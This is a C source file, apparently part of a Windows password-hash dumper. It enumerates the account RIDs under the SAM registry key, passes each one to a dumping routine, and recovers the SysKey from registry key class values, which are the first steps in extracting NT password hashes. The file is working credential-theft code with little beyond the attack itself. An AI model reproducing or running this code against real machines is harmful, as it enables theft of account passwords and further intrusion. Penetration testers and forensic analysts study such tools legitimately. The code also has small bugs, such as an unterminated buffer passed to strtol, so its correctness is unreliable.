#include "GetSAM.h"


int RegistryEnumerateSAM(){
HKEY hSAM;
DWORD dwError, indexSubKey = 0, cchValueName = MAX_PATH;

int rid;

char buffer[MAX_PATH];
LPTSTR lpbuf = buffer;

	//Open SAM to retrieve NT hash
	dwError = RegOpenKeyEx(HKEY_LOCAL_MACHINE, REGISTRY_KEY, 0, KEY_READ, &hSAM);
	if (dwError != ERROR_SUCCESS){
		wsprintf(lpbuf, "%d", dwError);
		Write2LogFile("Error RegOpen:", 0);
		Write2LogFile(lpbuf, 0);
		return(1);
	}

	while (1){
		dwError = RegEnumKey(hSAM, indexSubKey, lpbuf, cchValueName);

		switch (dwError){
				case ERROR_SUCCESS:
					rid = strtol(lpbuf, NULL, 16);
					if (!rid)break;
					else {
						//Write2LogFile("Rid:", 0);
						//Write2LogFile(lpbuf, 0);
						DumpSam(lpbuf);
						indexSubKey++;
					}
					break;
				case ERROR_NO_MORE_ITEMS:
					RegCloseKey(hSAM);
				return (0);
				case ERROR_MORE_DATA:
					RegCloseKey(hSAM);
				return (1);
			}//end switch

	}//end while

	//DumpSam("000003E9");

return(0);
}

void EnumerateRegValues(HKEY hSAM, LPTSTR lpfield, PBYTE ppvBlock, LPDWORD ppvBlockLen){
DWORD dwError, dwSubError, dwType,
	indexSubKey = 0, 
	cchValueName = MAX_PATH, 
	dwcbData = MAX_PATH;

char buffer[MAX_PATH];
LPTSTR lpbuf = buffer;

	while (1){
		cchValueName = MAX_PATH;
		dwError = RegEnumValue(hSAM, indexSubKey, lpbuf, (LPDWORD)&cchValueName, 
				NULL, NULL, NULL, NULL);
			switch (dwError){
				case ERROR_SUCCESS:
					if (!lstrcmp(lpbuf, lpfield)){
							dwError = RegGetValue(hSAM, NULL, lpbuf, 
								RRF_RT_ANY, &dwType, ppvBlock, ppvBlockLen);

								switch (dwError){
									case ERROR_SUCCESS:
										if (dwType != 3){
											Write2LogFile("Error data type unexptected", 0);
											}
										/*else {
											wsprintf(lpbuf, "%s %d", "Field length:", *ppvBlockLen);
											Write2LogFile(lpbuf, 0);
										}*/
										return;
									case ERROR_MORE_DATA:
										Write2LogFile("Error more data", 0);
										wsprintf(lpbuf, "%d", dwcbData);
										Write2LogFile(lpbuf, 0);
										return;
									default:
										Write2LogFile("Error getting data", 0);
										wsprintf(lpbuf, "%x", dwError);
										Write2LogFile(lpbuf, 0);
										return;
									}//end switch
					}//end if 
					indexSubKey++;
					break;
				case ERROR_NO_MORE_ITEMS:
					//Write2LogFile("No more items", 0);
					return;
				case ERROR_MORE_DATA:
					//Write2LogFile("Error more data", 0);
					return;
			}//end switch

		}//end while


return;
}
void EnumerateRegData(HKEY hSAM, LPTSTR lpValueName, PBYTE ppvBlock, LPDWORD ppvBlockLen){
DWORD dwError, dwType, Counter,
	dwcbData = MAX_DATA_SIZE;

BYTE vData[MAX_DATA_SIZE];

char buffer[MAX_PATH];
LPTSTR lpbuf = buffer;

	dwError = RegGetValue(hSAM, NULL, lpValueName, RRF_RT_ANY, &dwType, ppvBlock, ppvBlockLen);

	switch (dwError){
		case ERROR_SUCCESS:
			if (dwType != 3){
				Write2LogFile("Error data type unexptected", 0);
				return;
			}			
			return;
		case ERROR_MORE_DATA:
			Write2LogFile("Error more data", 0);
			wsprintf(lpbuf, "%d", dwcbData);
			Write2LogFile(lpbuf, 0);
			return;
		default:
			Write2LogFile("Error getting data", 0);
			wsprintf(lpbuf, "%x", dwError);
			Write2LogFile(lpbuf, 0);
			return;
		}//end switch


return;
}

void RetrieveSysKey(LPTSTR lpRegistryKey, BYTE *RegistryKeyValue){
HKEY hKey;
char buffer[MAX_PATH], Class[MAX_PATH], *stop;
LPTSTR lpbuf = buffer;
LPTSTR lpClass = Class;

BYTE temp[2];

DWORD dwError, dwcClass, i;

	dwError = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpRegistryKey, 0, 
		KEY_READ, &hKey);
	if (dwError != ERROR_SUCCESS){
		wsprintf(lpbuf, "%d", dwError);
		Write2LogFile("Error RegOpen:", 0);
		Write2LogFile(lpbuf, 0);
		return;
	}
	else {
		dwcClass = MAX_PATH;
		dwError = RegQueryInfoKey(hKey, Class, &dwcClass, 
			NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL);

		if (dwError != ERROR_SUCCESS){
			wsprintf(lpbuf, "%d", dwError);
			Write2LogFile("Error RegQueryInfoKey:", 0);
			Write2LogFile(lpbuf, 0);
		}
		else {
			if (hKey)RegCloseKey(hKey);
			if (dwcClass != 8){
				Write2LogFile("Error class length", 0);
				return;
			}
			//Write2LogFile("Key before:", 0);
			//Write2LogFile(Class, 8);
			
			//Here convert value coded 2 bytes on 1 byte hex value
			for (i = 0; i < 4; i++){
				temp[0] = Class[2*i];
				temp[1] = Class[2*i + 1];
				RegistryKeyValue[i] = strtol(temp, &stop, 16);
			}
			return;
		}
	}//end else
	if (hKey)RegCloseKey(hKey);

return;
}